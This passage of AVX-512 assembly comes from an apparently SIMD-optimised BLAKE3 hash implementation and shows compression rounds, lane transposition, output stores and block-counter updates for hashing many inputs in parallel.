vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm22
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm31
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpxord zmm0, zmm0, zmm8
vpxord zmm1, zmm1, zmm9
vpxord zmm2, zmm2, zmm10
vpxord zmm3, zmm3, zmm11
vpxord zmm4, zmm4, zmm12
vpxord zmm5, zmm5, zmm13
vpxord zmm6, zmm6, zmm14
vpxord zmm7, zmm7, zmm15
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
vpunpckldq zmm16, zmm0, zmm1
vpunpckhdq zmm17, zmm0, zmm1
vpunpckldq zmm18, zmm2, zmm3
vpunpckhdq zmm19, zmm2, zmm3
vpunpckldq zmm20, zmm4, zmm5
vpunpckhdq zmm21, zmm4, zmm5
vpunpckldq zmm22, zmm6, zmm7
vpunpckhdq zmm23, zmm6, zmm7
vpunpcklqdq zmm0, zmm16, zmm18
vpunpckhqdq zmm1, zmm16, zmm18
vpunpcklqdq zmm2, zmm17, zmm19
vpunpckhqdq zmm3, zmm17, zmm19
vpunpcklqdq zmm4, zmm20, zmm22
vpunpckhqdq zmm5, zmm20, zmm22
vpunpcklqdq zmm6, zmm21, zmm23
vpunpckhqdq zmm7, zmm21, zmm23
vshufi32x4 zmm16, zmm0, zmm4, 0x88
vshufi32x4 zmm17, zmm1, zmm5, 0x88
vshufi32x4 zmm18, zmm2, zmm6, 0x88
vshufi32x4 zmm19, zmm3, zmm7, 0x88
vshufi32x4 zmm20, zmm0, zmm4, 0xDD
vshufi32x4 zmm21, zmm1, zmm5, 0xDD
vshufi32x4 zmm22, zmm2, zmm6, 0xDD
vshufi32x4 zmm23, zmm3, zmm7, 0xDD
vshufi32x4 zmm0, zmm16, zmm17, 0x88
vshufi32x4 zmm1, zmm18, zmm19, 0x88
vshufi32x4 zmm2, zmm20, zmm21, 0x88
vshufi32x4 zmm3, zmm22, zmm23, 0x88
vshufi32x4 zmm4, zmm16, zmm17, 0xDD
vshufi32x4 zmm5, zmm18, zmm19, 0xDD
vshufi32x4 zmm6, zmm20, zmm21, 0xDD
vshufi32x4 zmm7, zmm22, zmm23, 0xDD
vmovdqu32 zmmword ptr [rbx], zmm0
vmovdqu32 zmmword ptr [rbx+0x1*0x40], zmm1
vmovdqu32 zmmword ptr [rbx+0x2*0x40], zmm2
vmovdqu32 zmmword ptr [rbx+0x3*0x40], zmm3
vmovdqu32 zmmword ptr [rbx+0x4*0x40], zmm4
vmovdqu32 zmmword ptr [rbx+0x5*0x40], zmm5
vmovdqu32 zmmword ptr [rbx+0x6*0x40], zmm6
vmovdqu32 zmmword ptr [rbx+0x7*0x40], zmm7
vmovdqa32 zmm0, zmmword ptr [rsp]
vmovdqa32 zmm1, zmmword ptr [rsp+0x1*0x40]
vmovdqa32 zmm2, zmm0
vpaddd zmm2{k1}, zmm0, dword ptr [ADD16+rip] {1to16}
vpcmpltud k2, zmm2, zmm0
vpaddd zmm1 {k2}, zmm1, dword ptr [ADD1+rip] {1to16}
vmovdqa32 zmmword ptr [rsp], zmm2
vmovdqa32 zmmword ptr [rsp+0x1*0x40], zmm1
add rdi, 128
add rbx, 512
mov qword ptr [rbp+0x50], rbx
sub rsi, 16
cmp rsi, 16
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 6
3:
test esi, 0x8
je 3f
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
2:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm16, ymm12, ymm14, 136
vshufps ymm17, ymm12, ymm14, 221
vshufps ymm18, ymm13, ymm15, 136
vshufps ymm19, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm20, ymm12, ymm14, 136
vshufps ymm21, ymm12, ymm14, 221
vshufps ymm22, ymm13, ymm15, 136
vshufps ymm23, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm24, ymm12, ymm14, 136
vshufps ymm25, ymm12, ymm14, 221
vshufps ymm26, ymm13, ymm15, 136
vshufps ymm27, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm28, ymm12, ymm14, 136
vshufps ymm29, ymm12, ymm14, 221
vshufps ymm30, ymm13, ymm15, 136
vshufps ymm31, ymm13, ymm15, 221
vpbroadcastd ymm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd ymm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd ymm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd ymm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa ymm12, ymmword ptr [rsp]
vmovdqa ymm13, ymmword ptr [rsp+0x40]
vpbroadcastd ymm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd ymm15, dword ptr [rsp+0x88]
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm24
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm23
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm27
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm21
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
